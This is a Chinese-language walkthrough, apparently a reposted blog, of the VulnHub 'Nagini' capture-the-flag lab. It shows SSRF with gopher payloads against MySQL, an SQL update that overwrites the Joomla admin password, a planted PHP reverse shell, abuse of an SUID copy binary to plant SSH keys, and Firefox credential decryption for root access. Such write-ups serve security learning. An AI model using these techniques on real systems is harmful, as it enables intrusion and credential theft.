• vulnhub之Nagini


    目录

    一、存活主机发现

    二、端口扫描

    三、服务版本发现

    四、信息收集

    五、目录爆破

    1.默认字典爆破

    2.seclist字典爆破

    六、信息收集

    1.查看

    2.尝试绑定访问

     七、HTTP3的配置

    八、信息收集

     九、ssrf漏洞

    1.伪协议file

    2.读取备份文件

    3.gopher攻击mysql

    十、登录snape账号

    十一、su_cp

    十二、写入公钥和scp传输

     1.生成公私钥

    2.上传公钥

    3.更名,改权限

    4.拷贝到hermoine的.ssh

    十三、登录hermoine

     十四、提权


    一、存活主机发现

    二、端口扫描

    三、服务版本发现

    依旧是80和22端口

    四、信息收集

    主页面是一张图片,ctrl+u查看源码是啥都没有

    五、目录爆破

    1.默认字典爆破

    得到是joomla这个cms登录界面

    和joomla的后台登录界面

    但是这些信息不足以帮助我们突破边界,换字典扫描看结果

    2.seclist字典爆破

    爆破出来一个note.txt

    六、信息收集

    1.查看

    出现一个提示信息,要用http3来访问这个域名。

    2.尝试绑定访问

    sudo vim /etc/hosts

    发现与我们之前ip访问一样

     七、HTTP3的配置

    1.下载quiche

    git clone --recursive https://www.github.com/cloudflare/quiche

    2.安装cargo组件

    sudo apt install cargo

    3.cmake组件

    sudo apt install cmake

    4.安装例子

    有报错,执行下一步

    cd ./quiche

    cargo build --examples

    5.卸载rustc

    apt purge rustc

    6.重新安装

    curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh

    7.设置环境变量

    source $HOME/.cargo/env

    8.重新下载

    cargo build --examples

    9.对安装内容检查

    cargo test

    爆出一堆ok检查无误

    10.利用http3去访问url

    有个目录,提到了备份文件,尝试去访问

    八、信息收集

     1.通过第一条信息,我们访问了这个目录,有一个内部网络资源获取界面,存在ssrf漏洞。

    2.存在配置备份文件

    访问配置文件存在目录,可以下载到备份文件

       http://192.168.0.100/joomla/configuration.php.bak

    3.备份文件

    收集到登录数据库的用户名密码库名等

     九、ssrf漏洞

    1.伪协议file

    探测到了passwd文件,里面有几个有用的信息,可以通过/bin/bash登录的用户,和mysql这个账户。证明有mysql数据库,通过ssrf漏洞配合gopher伪协议可以攻击内网应用。

    2.读取备份文件

    利用ssrf配合伪协议,也可以读取备份文件

    3.gopher攻击mysql

    (1)下载工具

    git clone https://www.github.com/tarunkant/Gopherus.git

    (2)使用

    一定在ssrf界面多提交两次,有时候不会返回结果

    直接生成了一个payload,去查看表

    再生成一个payload去查看字段

     经过分析可以得到账号和密码

    site_admin@nagini.hogwarts

    <$2y$10$cmQ.akn2au104AhR4.YJBOC5W13gyV21D/bkoTmbWWqFWjzEW7vay

    密码复杂 无法破解

    (4)改写site_admin密码

    echo "123" | md5sum

    e7df7cd2ca07f4f1ab415d457a6e1c13

    (5)写入数据库

    use joomla;update joomla_users set password="e7df7cd2ca07f4f1ab415d457a6e1c13" where username="site_admin";

     (6)登录后台

    site_admin/123

    (7)写入反弹shell文件

    利用kali自带的php反弹shell

    反弹shell文件路径:/usr/share/webshells/php

    模板路径:/joomla/templates/protostar/error.php

    写入模板中

    (8)访问后成功反弹shell

    十、登录snape账号

    通过上面的shell我们可以从creds.txt中得到一个bash64密码

    解密:

    echo " " | base64 -d

    哈利波特中snape教授喜欢lilly,所以猜测这就是snape的密码

    Love@lilly

    1.flag1.txt

    SlythEriN's LocKEet dEstroYeD bY RoN

    十一、su_cp

    这里有一个su_cp,有suid权限,功能就是拷贝。

    十二、写入公钥和scp传输

     1.生成公私钥

    ssh-keygen

    2.上传公钥

    scp id_rsa.pub snape@192.168.0.100~/

    3.更名,改权限

    mv id_rsa.pub authorized_keys

    chmod 640 authorized_keys

    4.拷贝到hermoine的.ssh

    ./su_cp -p ~/id_rsa.pub ../.ssh

    十三、登录hermoine

    拿到第二个flag.txt,解密一下

    Helga Hufflepuff's Cup destroyed by Hermione  

     十四、提权

    1.发现

     在家目录下,发现了一个隐藏文件夹 .mozilla(浏览器),里面有个firefox(火狐),firefox一般来说只能在客户端上,但是这里出现在了服务端上。可以用作提权/

     2.下载读取火狐信息的工具

    git clone https://github.com/unode/firefox_decrypt.git

    3.firefox拷贝到本地

    scp -r  hermoine@192.168.0.100:~/.mozilla/firefox ./

    4.firefox_decrypt

    5.直接ssh登录

     解密后:

     Diadem of Ravenclaw destroyed by Harryroot@Nagini

  • 相关阅读:
    [Java | Web] JavaWeb——Filter 过滤器
    请协助我搭建 bert
    第七篇 python IO操作
    二分法的常见问题
    【硬件架构的艺术】学习笔记(2)同步和复位
    Kotlin 数据类型详解:数字、字符、布尔值与类型转换指南
    人人都会数据分析
    Dockerfile详解与实践
    LeetCode:1402. 做菜顺序、2316. 统计无向图中无法互相到达点对数
    JetBrains问题汇总
  • 原文地址:https://blog.csdn.net/weixin_54431413/article/details/125393128